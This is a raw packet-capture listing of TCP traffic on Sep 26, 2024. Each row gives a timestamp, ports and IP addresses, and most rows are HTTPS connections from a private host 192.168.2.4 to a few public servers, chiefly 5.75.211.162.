Sep 26, 2024 22:57:10.920917034 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.920917034 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.920917034 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:10.938693047 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:10.938728094 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:10.939407110 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:10.939760923 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:10.939775944 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.225650072 CEST	49779	443	192.168.2.4	23.197.127.21
Sep 26, 2024 22:57:11.225681067 CEST	443	49779	23.197.127.21	192.168.2.4
Sep 26, 2024 22:57:11.415144920 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.415406942 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:11.418082952 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:11.418092966 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.418427944 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.419946909 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:11.419946909 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:11.420074940 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.883135080 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.883368015 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.883440971 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:11.889729977 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:11.889748096 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:11.889760017 CEST	49780	443	192.168.2.4	104.21.2.13
Sep 26, 2024 22:57:11.889765024 CEST	443	49780	104.21.2.13	192.168.2.4
Sep 26, 2024 22:57:16.038726091 CEST	49777	80	192.168.2.4	45.132.206.251
Sep 26, 2024 22:57:27.603312016 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:27.603344917 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:27.603429079 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:27.605998993 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:27.606030941 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.277364969 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.277556896 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.339939117 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.339979887 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.340965033 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.341037035 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.342864037 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.387399912 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.791537046 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.791570902 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.791610956 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.791697025 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.791712046 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.791737080 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.791763067 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.895807981 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.895868063 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.895895004 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.895922899 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.895936012 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.898020983 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.900935888 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.900994062 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.901037931 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.901189089 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.901243925 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.904879093 CEST	49781	443	192.168.2.4	104.102.49.254
Sep 26, 2024 22:57:28.904912949 CEST	443	49781	104.102.49.254	192.168.2.4
Sep 26, 2024 22:57:28.948230982 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:28.948277950 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:28.948551893 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:28.950644016 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:28.950665951 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:29.614967108 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:29.615143061 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:29.618582010 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:29.618594885 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:29.618971109 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:29.620068073 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:29.620352030 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:29.663445950 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.245009899 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.245136976 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.245155096 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.245208979 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.245214939 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.245258093 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.246239901 CEST	49782	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.246259928 CEST	443	49782	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.248478889 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.248579025 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.248724937 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.248934031 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.248956919 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.898931026 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.899136066 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.899624109 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.899657011 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:30.901135921 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:30.901149035 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:31.596627951 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:31.596739054 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:31.596805096 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:31.596843958 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:31.596868992 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:31.596925020 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:31.597136974 CEST	49783	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:31.597170115 CEST	443	49783	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:31.673209906 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:31.673280001 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:31.673455000 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:31.676539898 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:31.676578045 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:32.331310034 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:32.331446886 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:32.331871986 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:32.331903934 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:32.333568096 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:32.333580971 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.029819012 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.029872894 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.029983044 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.029983044 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.030055046 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.030087948 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.030111074 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.030150890 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.032164097 CEST	49784	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.032197952 CEST	443	49784	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.033752918 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.033799887 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.033874035 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.034176111 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.034195900 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.711702108 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.711766958 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.712208033 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.712219000 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:33.713705063 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:33.713711977 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:34.553545952 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:34.553580999 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:34.553652048 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:34.553687096 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:34.553740978 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:34.556371927 CEST	49785	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:34.556410074 CEST	443	49785	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:34.558475971 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:34.558518887 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:34.558593988 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:34.558779955 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:34.558798075 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.225400925 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.225488901 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.226027012 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.226042032 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.227627039 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.227632999 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.926297903 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.926378012 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.926408052 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.926446915 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.926454067 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.926496029 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.926517963 CEST	49786	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.926536083 CEST	443	49786	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.982165098 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.982253075 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:35.982346058 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.982525110 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:35.982558966 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:36.654365063 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:36.654525995 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:36.655002117 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:36.655033112 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:36.656661987 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:36.656677008 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:36.656734943 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:36.656754017 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:36.991978884 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:36.992083073 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:36.992240906 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:36.992578983 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:36.992618084 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:37.426461935 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:37.426584005 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:37.426629066 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:37.426697969 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:37.427659988 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:37.427702904 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:37.661642075 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:37.661720991 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:37.662177086 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:37.662190914 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:37.663836956 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:37.663844109 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.100404024 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.100428104 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.100442886 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.100595951 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.100666046 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.100754023 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.131850004 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.131896019 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.131972075 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.131994963 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.132028103 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.132050037 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.200541019 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.200584888 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.200655937 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.200685024 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.200715065 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.200752974 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.227165937 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.227226019 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.227266073 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.227284908 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.227313995 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.227333069 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.260751963 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.260802984 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.260881901 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.260905981 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.260937929 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.260957003 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.292418003 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.292438984 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.292679071 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.292702913 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.292793036 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.316138029 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.316251040 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.316464901 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.316526890 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.316600084 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.334095001 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.334144115 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.334345102 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.334362030 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.334424019 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.351226091 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.351277113 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.351327896 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.351344109 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.351377964 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.351424932 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.365130901 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.365175962 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.365231991 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.365247011 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.365273952 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.365298986 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.380971909 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.381021023 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.381062984 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.381077051 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.381108046 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.381128073 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.393778086 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.393825054 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.393870115 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.393883944 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.393913031 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.393935919 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.408508062 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.408550978 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.408632040 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.408647060 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.408701897 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.421782017 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.421823025 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.421943903 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.421961069 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.422080040 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.431456089 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.431499004 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.431572914 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.431590080 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.431644917 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.440949917 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.440993071 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.441106081 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.441133022 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.441157103 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.441188097 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.450325966 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.450376034 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.450570107 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.450571060 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.450602055 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.450710058 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.457451105 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.457493067 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.457567930 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.457578897 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.457617044 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.457638025 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.469060898 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.469100952 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.469171047 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.469182014 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.469198942 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.469232082 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.481952906 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.481997013 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.482049942 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.482060909 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.482078075 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.482109070 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.494442940 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.494488001 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.494550943 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.494560957 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.494606018 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.494618893 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.529581070 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.529675961 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.529817104 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.529831886 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.529896021 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.535356998 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.535465956 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.535470009 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.535499096 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.535537004 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.535553932 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.538186073 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.538234949 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.538276911 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.538285017 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.538311005 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.538338900 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.540355921 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.540400982 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.540441036 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.540448904 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.540472984 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.540493011 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 26, 2024 22:57:38.545344114 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.545425892 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 26, 2024 22:57:38.545433998 CEST	49788	443	192.168.2.4	5.75.211.162
